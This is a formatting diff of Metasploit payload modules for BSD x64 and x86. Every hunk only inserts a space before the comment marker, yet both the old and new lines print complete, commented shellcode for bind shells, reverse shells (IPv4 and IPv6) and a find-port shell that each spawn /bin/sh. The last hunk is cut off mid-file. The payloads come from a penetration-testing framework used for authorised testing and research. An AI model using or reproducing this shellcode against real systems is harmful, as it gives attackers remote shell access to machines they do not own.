           'Payload' =>
-            "\x6a\x61"             +#   pushq  $0x61                       #
-            "\x58"                 +#  	pop    %rax                        #
-            "\x99"                 +#  	cltd                               #
-            "\x6a\x1c"             +#   pushq  $0x1c                       #
-            "\x5f"                 +#  	pop    %rdi                        #
-            "\x6a\x01"             +#   pushq  $0x1                        #
-            "\x5e"                 +#  	pop    %rsi                        #
-            "\x0f\x05"             +#   syscall                            #
-            "\x48\x97"             +#   xchg   %rax,%rdi                   #
-            "\x52"                 +#  	push   %rdx                        #
-            "\x52"                 +#  	push   %rdx                        #
-            "\x52"                 +#  	push   %rdx                        #
-            "\xba\x00\x1c\x11\x5C" +#   mov edx,0x5c111c00                 #
-            "\x52"                 +#	  push   %rdx                        #
-            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
-            "\x6a\x1c"             +#   pushq  $0x1c                       #
-            "\x5a"                 +#  	pop    %rdx                        #
-            "\x04\x4c"             +#   add    $0x4c,%al                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\x48\x31\xf6"         +#   xor    %rsi,%rsi                   #
-            "\x6a\x6a"             +#   pushq  $0x6a                       #
-            "\x58"                 +#  	pop    %rax                        #
-            "\x0f\x05"             +#   syscall                            #
-            "\x99"                 +#  	cltd                               #
-            "\x04\x1e"             +#   add    $0x1e,%al                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\x48\x89\xc7"         +#   mov    %rax,%rdi                   #
-            "\x6a\x5a"             +#   pushq  $0x5a                       #
-            "\x58"                 +#  	pop    %rax                        #
-            "\x0f\x05"             +#   syscall                            #
-            "\xff\xc6"             +#   inc    %esi                        #
-            "\x04\x5a"             +#   add    $0x5a,%al                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\xff\xc6"             +#  	inc    %esi                        #
-            "\x04\x59"             +#  	add    $0x59,%al                   #
-            "\x0f\x05"             +#  	syscall                            #
-            "\x52"                 +# 	push   %rdx                        #
-            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
-            "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
-            "\x57"                 +#	push   %rdi                        #
-            "\x48\x89\xe7"         +# 	mov    %rsp,%rdi                   #
-            "\x52"                 +# 	push   %rdx                        #
-            "\x57"                 +# 	push   %rdi                        #
-            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
-            "\x04\x39"             +#  	add    $0x39,%al                   #
-            "\x0f\x05"              # 	syscall                            #
+            "\x6a\x61"             + #   pushq  $0x61                       #
+            "\x58"                 + #   pop    %rax                        #
+            "\x99"                 + #   cltd                               #
+            "\x6a\x1c"             + #   pushq  $0x1c                       #
+            "\x5f"                 + #   pop    %rdi                        #
+            "\x6a\x01"             + #   pushq  $0x1                        #
+            "\x5e"                 + #   pop    %rsi                        #
+            "\x0f\x05"             + #   syscall                            #
+            "\x48\x97"             + #   xchg   %rax,%rdi                   #
+            "\x52"                 + #   push   %rdx                        #
+            "\x52"                 + #   push   %rdx                        #
+            "\x52"                 + #   push   %rdx                        #
+            "\xba\x00\x1c\x11\x5C" + #   mov edx,0x5c111c00                 #
+            "\x52"                 + #   push   %rdx                        #
+            "\x48\x89\xe6"         + #   mov    %rsp,%rsi                   #
+            "\x6a\x1c"             + #   pushq  $0x1c                       #
+            "\x5a"                 + #   pop    %rdx                        #
+            "\x04\x4c"             + #   add    $0x4c,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\x48\x31\xf6"         + #   xor    %rsi,%rsi                   #
+            "\x6a\x6a"             + #   pushq  $0x6a                       #
+            "\x58"                 + #   pop    %rax                        #
+            "\x0f\x05"             + #   syscall                            #
+            "\x99"                 + #   cltd                               #
+            "\x04\x1e"             + #   add    $0x1e,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\x48\x89\xc7"         + #   mov    %rax,%rdi                   #
+            "\x6a\x5a"             + #   pushq  $0x5a                       #
+            "\x58"                 + #   pop    %rax                        #
+            "\x0f\x05"             + #   syscall                            #
+            "\xff\xc6"             + #   inc    %esi                        #
+            "\x04\x5a"             + #   add    $0x5a,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\xff\xc6"             + #   inc    %esi                        #
+            "\x04\x59"             + #   add    $0x59,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\x52"                 + #   push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" + #   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" + #   mov "in/sh",%rdi                   #
+            "\x57"                 + #   push   %rdi                        #
+            "\x48\x89\xe7"         + #   mov    %rsp,%rdi                   #
+            "\x52"                 + #   push   %rdx                        #
+            "\x57"                 + #   push   %rdi                        #
+            "\x48\x89\xe6"         + #   mov    %rsp,%rsi                   #
+            "\x04\x39"             + #   add    $0x39,%al                   #
+            "\x0f\x05"               #   syscall                            #
         }
       ))
   end

--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -33,50 +33,50 @@ module MetasploitModule
               'LPORT'    => [ 18, 'n' ],
             },
           'Payload' =>
-            "\x6a\x61"             +#	pushq  $0x61                       #
-            "\x58"                 +#	pop    %rax                        #
-            "\x99"                 +#	cltd                               #
-            "\x6a\x02"             +#	pushq  $0x2                        #
-            "\x5f"                 +#	pop    %rdi                        #
-            "\x6a\x01"             +#	pushq  $0x1                        #
-            "\x5e"                 +#	pop    %rsi                        #
-            "\x0f\x05"             +#	syscall                            #
-            "\x48\x97"             +#	xchg   %rax,%rdi                   #
-            "\x52"                 +#	push   %rdx                        #
-            "\xba\x00\x02\x11\x5C" +#	mov edx,0x5c110200                 #
-            "\x52"                 +#	push   %rdx                        #
-            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
-            "\x6a\x10"             +#	pushq  $0x10                       #
-            "\x5a"                 +#	pop    %rdx                        #
-            "\x04\x66"             +#	add    $0x66,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\x48\x31\xf6"         +#	xor    %rsi,%rsi                   #
-            "\x6a\x6a"             +#	pushq  $0x6a                       #
-            "\x58"                 +#	pop    %rax                        #
-            "\x0f\x05"             +#	syscall                            #
-            "\x99"                 +#	cltd                               #
-            "\x04\x1e"             +#	add    $0x1e,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\x48\x89\xc7"         +#	mov    %rax,%rdi                   #
-            "\x6a\x5a"             +#	pushq  $0x5a                       #
-            "\x58"                 +#	pop    %rax                        #
-            "\x0f\x05"             +#	syscall                            #
-            "\xff\xc6"             +#	inc    %esi                        #
-            "\x04\x5a"             +#	add    $0x5a,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\xff\xc6"             +#	inc    %esi                        #
-            "\x04\x59"             +#	add    $0x59,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\x52"                 +#   push   %rdx                        #
-            "\x48\xbf\x2f\x2f"     +#   mov "//"                           #
-            "\x62\x69\x6e\x2f"     +#   "bin/sh"                           #
-            "\x73\x68"             +#   mov    $0x68732f6e69622f2f,%rdi    #
-            "\x57"                 +#	push   %rdi                        #
-            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
-            "\x52"                 +#	push   %rdx                        #
-            "\x57"                 +#	push   %rdi                        #
-            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
-            "\x04\x39"             +#	add    $0x39,%al                   #
+            "\x6a\x61"             + #	pushq  $0x61                       #
+            "\x58"                 + #	pop    %rax                        #
+            "\x99"                 + #	cltd                               #
+            "\x6a\x02"             + #	pushq  $0x2                        #
+            "\x5f"                 + #	pop    %rdi                        #
+            "\x6a\x01"             + #	pushq  $0x1                        #
+            "\x5e"                 + #	pop    %rsi                        #
+            "\x0f\x05"             + #	syscall                            #
+            "\x48\x97"             + #	xchg   %rax,%rdi                   #
+            "\x52"                 + #	push   %rdx                        #
+            "\xba\x00\x02\x11\x5C" + #	mov edx,0x5c110200                 #
+            "\x52"                 + #	push   %rdx                        #
+            "\x48\x89\xe6"         + #	mov    %rsp,%rsi                   #
+            "\x6a\x10"             + #	pushq  $0x10                       #
+            "\x5a"                 + #	pop    %rdx                        #
+            "\x04\x66"             + #	add    $0x66,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\x48\x31\xf6"         + #	xor    %rsi,%rsi                   #
+            "\x6a\x6a"             + #	pushq  $0x6a                       #
+            "\x58"                 + #	pop    %rax                        #
+            "\x0f\x05"             + #	syscall                            #
+            "\x99"                 + #	cltd                               #
+            "\x04\x1e"             + #	add    $0x1e,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\x48\x89\xc7"         + #	mov    %rax,%rdi                   #
+            "\x6a\x5a"             + #	pushq  $0x5a                       #
+            "\x58"                 + #	pop    %rax                        #
+            "\x0f\x05"             + #	syscall                            #
+            "\xff\xc6"             + #	inc    %esi                        #
+            "\x04\x5a"             + #	add    $0x5a,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\xff\xc6"             + #	inc    %esi                        #
+            "\x04\x59"             + #	add    $0x59,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\x52"                 + #   push   %rdx                        #
+            "\x48\xbf\x2f\x2f"     + #   mov "//"                           #
+            "\x62\x69\x6e\x2f"     + #   "bin/sh"                           #
+            "\x73\x68"             + #   mov    $0x68732f6e69622f2f,%rdi    #
+            "\x57"                 + #	push   %rdi                        #
+            "\x48\x89\xe7"         + #	mov    %rsp,%rdi                   #
+            "\x52"                 + #	push   %rdx                        #
+            "\x57"                 + #	push   %rdi                        #
+            "\x48\x89\xe6"         + #	mov    %rsp,%rsi                   #
+            "\x04\x39"             + #	add    $0x39,%al                   #
             "\x0f\x05"              #   syscall                            #
         }
       ))

--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -35,51 +35,51 @@ module MetasploitModule
               'SCOPEID'  => [ 101,  'V' ]
             },
           'Payload' =>
-            "\x6a\x61"             +#  	pushq  $0x61                       #
-            "\x58"                 +#  	pop    %rax                        #
-            "\x99"                 +#  	cltd                               #
-            "\x6a\x1c"             +#  	pushq  $0x1c                       #
-            "\x5f"                 +#  	pop    %rdi                        #
-            "\x6a\x01"             +#   pushq  $0x1                        #
-            "\x5e"                 +#  	pop    %rsi                        #
-            "\x0f\x05"             +#   syscall                            #
-            "\x48\x97"             +#   xchg   %rax,%rdi                   #
-            "\x04\x3e"             +#   add    $0x3e,%al                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\xff\xc6"             +#   inc    %esi                        #
-            "\x04\x59"             +#   add    $0x59,%al                   #
-            "\x0f\x05"             +#  	syscall                            #
-            "\xff\xce"             +#  	dec    %esi                        #
-            "\xff\xce"             +#   dec    %esi                        #
-            "\x04\x58"             +#   add    $0x58,%al                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\xe9\x23\x00\x00\x00" +#   jmpq   <forth>                     #
+            "\x6a\x61"             + #  	pushq  $0x61                       #
+            "\x58"                 + #  	pop    %rax                        #
+            "\x99"                 + #  	cltd                               #
+            "\x6a\x1c"             + #  	pushq  $0x1c                       #
+            "\x5f"                 + #  	pop    %rdi                        #
+            "\x6a\x01"             + #   pushq  $0x1                        #
+            "\x5e"                 + #  	pop    %rsi                        #
+            "\x0f\x05"             + #   syscall                            #
+            "\x48\x97"             + #   xchg   %rax,%rdi                   #
+            "\x04\x3e"             + #   add    $0x3e,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\xff\xc6"             + #   inc    %esi                        #
+            "\x04\x59"             + #   add    $0x59,%al                   #
+            "\x0f\x05"             + #  	syscall                            #
+            "\xff\xce"             + #  	dec    %esi                        #
+            "\xff\xce"             + #   dec    %esi                        #
+            "\x04\x58"             + #   add    $0x58,%al                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\xe9\x23\x00\x00\x00" + #   jmpq   <forth>                     #
             # back:
-            "\x5e"                 +#   pop    %rsi                        #
-            "\x6a\x1c"             +#   pushq  $0x1c                       #
-            "\x5a"                 +#  	pop    %rdx                        #
-            "\x66\x83\xc0\x62"     +#   add    $0x62,%ax                   #
-            "\x0f\x05"             +#   syscall                            #
-            "\x99"                 +#  	cltd                               #
-            "\x52"                 +#  	push   %rdx                        #
-            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
-            "\x69\x6e\x2f\x73\x68" +#  	"in/sh",%rdi                       #
-            "\x57"                 +#  	push   %rdi                        #
-            "\x48\x89\xe7"         +#   mov    %rsp,%rdi                   #
-            "\x52"                 +#  	push   %rdx                        #
-            "\x57"                 +#  	push   %rdi                        #
-            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
-            "\x04\x3b"             +#   add    $0x3b,%al                   #
-            "\x0f\x05"             +# 	syscall                            #
+            "\x5e"                 + #   pop    %rsi                        #
+            "\x6a\x1c"             + #   pushq  $0x1c                       #
+            "\x5a"                 + #  	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     + #   add    $0x62,%ax                   #
+            "\x0f\x05"             + #   syscall                            #
+            "\x99"                 + #  	cltd                               #
+            "\x52"                 + #  	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" + #   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" + #  	"in/sh",%rdi                       #
+            "\x57"                 + #  	push   %rdi                        #
+            "\x48\x89\xe7"         + #   mov    %rsp,%rdi                   #
+            "\x52"                 + #  	push   %rdx                        #
+            "\x57"                 + #  	push   %rdi                        #
+            "\x48\x89\xe6"         + #   mov    %rsp,%rsi                   #
+            "\x04\x3b"             + #   add    $0x3b,%al                   #
+            "\x0f\x05"             + # 	syscall                            #
             # forth:
-            "\xe8\xd8\xff\xff\xff" +#   callq <back>                       #
+            "\xe8\xd8\xff\xff\xff" + #   callq <back>                       #
             # sockaddr_in6
-            "\x00\x1c\x11\x5c"     +#   AF_INET6+port                      #
-            "\x00\x00\x00\x00"     +#   no-one-cares                       #
-            "\x00\x00\x00\x00"     +#   IPv6-                              #
-            "\x00\x00\x00\x00"     +#   addr-                              #
-            "\x00\x00\x00\x00"     +#   in-                                #
-            "\x00\x00\x00\x01"     +#   16 bytes                           #
+            "\x00\x1c\x11\x5c"     + #   AF_INET6+port                      #
+            "\x00\x00\x00\x00"     + #   no-one-cares                       #
+            "\x00\x00\x00\x00"     + #   IPv6-                              #
+            "\x00\x00\x00\x00"     + #   addr-                              #
+            "\x00\x00\x00\x00"     + #   in-                                #
+            "\x00\x00\x00\x01"     + #   16 bytes                           #
             "\x00\x00\x00\x00"      #   Scope ID                           #
         }
       ))

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
@@ -34,43 +34,43 @@ module MetasploitModule
               'LPORT'    => [ 37, 'n' ],
             },
           'Payload' =>
-            "\x6a\x61"             +#	pushq  $0x61                       #
-            "\x58"                 +#	pop    %rax                        #
-            "\x99"                 +#	cltd                               #
-            "\x6a\x02"             +#	pushq  $0x2                        #
-            "\x5f"                 +#	pop    %rdi                        #
-            "\x6a\x01"             +#	pushq  $0x1                        #
-            "\x5e"                 +#	pop    %rsi                        #
-            "\x0f\x05"             +#	syscall                            #
-            "\x48\x97"             +#	xchg   %rax,%rdi                   #
-            "\x04\x58"             +#	add    $0x58,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\xff\xc6"             +#	inc    %esi                        #
-            "\x04\x59"             +#	add    $0x59,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\xff\xce"             +#	dec    %esi                        #
-            "\xff\xce"             +#	dec    %esi                        #
-            "\x04\x58"             +#	add    $0x58,%al                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\x52"                 +#	push   %rdx                        #
-            "\x48\xbb\x00\x02\x11" +#   mov    ...                         #
-            "\x5c\x7f\x00\x00\x01" +#   mov    $0x100007f5c110200,%rbx     #
-            "\x53"                 +#	push   %rbx                        #
-            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
-            "\x6a\x10"             +#	pushq  $0x10                       #
-            "\x5a"                 +#	pop    %rdx                        #
-            "\x66\x83\xc0\x62"     +#	add    $0x62,%ax                   #
-            "\x0f\x05"             +#	syscall                            #
-            "\x99"                 +#	cltd                               #
-            "\x52"                 +#	push   %rdx                        #
-            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
-            "\x69\x6e\x2f\x73\x68" +# 	"in/sh", %rdi                      #
-            "\x57"                 +#	push   %rdi                        #
-            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
-            "\x52"                 +#	push   %rdx                        #
-            "\x57"                 +#	push   %rdi                        #
-            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
-            "\x04\x3b"             +#	add    $0x3b,%al                   #
+            "\x6a\x61"             + #	pushq  $0x61                       #
+            "\x58"                 + #	pop    %rax                        #
+            "\x99"                 + #	cltd                               #
+            "\x6a\x02"             + #	pushq  $0x2                        #
+            "\x5f"                 + #	pop    %rdi                        #
+            "\x6a\x01"             + #	pushq  $0x1                        #
+            "\x5e"                 + #	pop    %rsi                        #
+            "\x0f\x05"             + #	syscall                            #
+            "\x48\x97"             + #	xchg   %rax,%rdi                   #
+            "\x04\x58"             + #	add    $0x58,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\xff\xc6"             + #	inc    %esi                        #
+            "\x04\x59"             + #	add    $0x59,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\xff\xce"             + #	dec    %esi                        #
+            "\xff\xce"             + #	dec    %esi                        #
+            "\x04\x58"             + #	add    $0x58,%al                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\x52"                 + #	push   %rdx                        #
+            "\x48\xbb\x00\x02\x11" + #   mov    ...                         #
+            "\x5c\x7f\x00\x00\x01" + #   mov    $0x100007f5c110200,%rbx     #
+            "\x53"                 + #	push   %rbx                        #
+            "\x48\x89\xe6"         + #	mov    %rsp,%rsi                   #
+            "\x6a\x10"             + #	pushq  $0x10                       #
+            "\x5a"                 + #	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     + #	add    $0x62,%ax                   #
+            "\x0f\x05"             + #	syscall                            #
+            "\x99"                 + #	cltd                               #
+            "\x52"                 + #	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" + #   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" + # 	"in/sh", %rdi                      #
+            "\x57"                 + #	push   %rdi                        #
+            "\x48\x89\xe7"         + #	mov    %rsp,%rdi                   #
+            "\x52"                 + #	push   %rdx                        #
+            "\x57"                 + #	push   %rdi                        #
+            "\x48\x89\xe6"         + #	mov    %rsp,%rsi                   #
+            "\x04\x3b"             + #	add    $0x3b,%al                   #
             "\x0f\x05"              #	syscall                            #
         }
       ))

--- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb
@@ -32,43 +32,43 @@ module MetasploitModule
               'LPORT'    => [ 6, 'n' ],
             },
           'Payload' =>
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x01"             +#   pushl   $0x01                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\xb0\x61"             +#   movb    $0x61,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x68"             +#   pushl   $0x68                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x89\x47\xec"         +#   movl    %eax,-0x14(%edi)           #
-            "\xb0\x6a"             +#   movb    $0x6a,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xb0\x1e"             +#   movb    $0x1e,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xe4"         +#   decl    -0x1c(%edi)                #
-            "\x79\xf6"             +#   jns     <bndsockcode+42>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\xff\x02\x04\xd2" + #   pushl   $0xd20402ff                #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x01"             + #   pushl   $0x01                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\xb0\x61"             + #   movb    $0x61,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x68"             + #   pushl   $0x68                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x89\x47\xec"         + #   movl    %eax,-0x14(%edi)           #
+            "\xb0\x6a"             + #   movb    $0x6a,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xb0\x1e"             + #   movb    $0x1e,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xe4"         + #   decl    -0x1c(%edi)                #
+            "\x79\xf6"             + #   jns     <bndsockcode+42>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
             "\xcd\x80"              #   int     $0x80                      #
         }
       ))

--- a/modules/payloads/singles/bsd/x86/shell_find_port.rb
+++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb
@@ -32,38 +32,38 @@ module MetasploitModule
               'CPORT' => [ 25, 'n' ],
             },
           'Payload' =>
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x58"                 +#   popl    %eax                       #
-            "\x58"                 +#   popl    %eax                       #
-            "\x40"                 +#   incl    %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x1f"             +#   pushl   $0x1f                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x66\x81\x7f\x02\x04\xd2"+#   cmpw    $0xd204,0x02(%edi)         #
-            "\x75\xee"             +#   jne     <fndsockcode+11>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xf0"         +#   decl    -0x10(%edi)                #
-            "\x79\xf6"             +#   jns     <fndsockcode+30>           #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x58"                 + #   popl    %eax                       #
+            "\x58"                 + #   popl    %eax                       #
+            "\x40"                 + #   incl    %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x1f"             + #   pushl   $0x1f                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x66\x81\x7f\x02\x04\xd2"+ #   cmpw    $0xd204,0x02(%edi)         #
+            "\x75\xee"             + #   jne     <fndsockcode+11>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xf0"         + #   decl    -0x10(%edi)                #
+            "\x79\xf6"             + #   jns     <fndsockcode+30>           #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
             "\xcd\x80"              #   int     $0x80                      #
         }
       ))

--- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb
@@ -33,36 +33,36 @@ module MetasploitModule
               'LPORT'    => [ 8, 'n'    ],
             },
           'Payload' =>
-            "\x68\x7f\x00\x00\x01" +#   pushl   $0x0100007f                #
-            "\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x01"             +#   pushl   $0x01                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\xb0\x61"             +#   movb    $0x61,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x62"             +#   pushl   $0x62                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xe8"         +#   decl    -0x18(%edi)                #
-            "\x79\xf6"             +#   jns     <cntsockcode+34>           #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
+            "\x68\x7f\x00\x00\x01" + #   pushl   $0x0100007f                #
+            "\x68\xff\x02\x04\xd2" + #   pushl   $0xd20402ff                #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x01"             + #   pushl   $0x01                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\xb0\x61"             + #   movb    $0x61,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x62"             + #   pushl   $0x62                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x50"                 + #   pushl   %eax                       #
